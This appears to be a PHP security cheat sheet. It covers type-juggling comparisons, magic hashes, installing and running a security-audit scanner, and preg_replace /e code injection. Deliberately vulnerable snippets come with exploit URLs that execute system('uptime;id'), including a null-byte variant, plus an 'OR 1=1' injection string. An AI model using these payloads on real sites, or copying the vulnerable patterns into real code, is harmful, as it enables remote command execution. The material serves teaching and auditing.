PHP
PHP¶
Insecure SessionID:
http://samy.pl/phpwn/
https://pwnage.io/not-so-random-numbers-article-by/
Magic Hashes:
https://github.com/spaze/hashes
Type Confusion¶
Always check data type before comparing values
assert(0 == '0ABC'); //returns TRUE
assert(0 == 'ABC'); //returns TRUE (even without starting integer!)
assert(0 === '0ABC'); //returns NULL/issues Warning as a strict comparison
function checkIntegerRangeTheWrongWay($int, $min, $max)
{
return ($int >= $min && $int <= $max);
}
assert(checkIntegerRangeTheWrongWay(“6’ OR 1=1”, 5, 10)); //returns TRUE incorrectly
Hash Comparison¶
https://posts.slayerlabs.com/rconfig-vulns/
PHPCS Auditor¶
Example:
>>> composer require pheromone/phpcs-security-audit
Using version ^2.0 for pheromone/phpcs-security-audit
./composer.json has been created
Loading composer repositories with package information
Updating dependencies (including require-dev)
Package operations: 2 installs, 0 updates, 0 removals
- Installing squizlabs/php_codesniffer (3.5.3): Downloading (100%)
- Installing pheromone/phpcs-security-audit (2.0.1): Downloading (100%)
Writing lock file
Generating autoload files
bridings@lupin:/tmp
>>> sh vendor/pheromone/phpcs-security-audit/symlink.sh
Symlink created.
bridings@lupin:/tmp
>>> ./vendor/bin/phpcs --extensions=php,inc,lib,module,info --standard=./vendor/pheromone/phpcs-security-audit/example_base_ruleset.xml ./vendor/pheromone/phpcs-security-audit/
preg_replace¶
Also affects ereg_replace(), eregi_replace(), mb_ereg_replace() and mb_eregi_replace()!
Example Bad Code:
<?php
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace($_GET['replace'], $_GET['with'], $in);
?>
Exploit Parameter:
http://example.com?replace=/known/e&with=system('uptime;id')
Example Bad Code2:
<?php
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace('/' . $_GET['replace'] . '/i', $_GET['with'], $in);
?>
Exploit Parameter:
http://example.com?replace=known/e%00&with=system('uptime;id')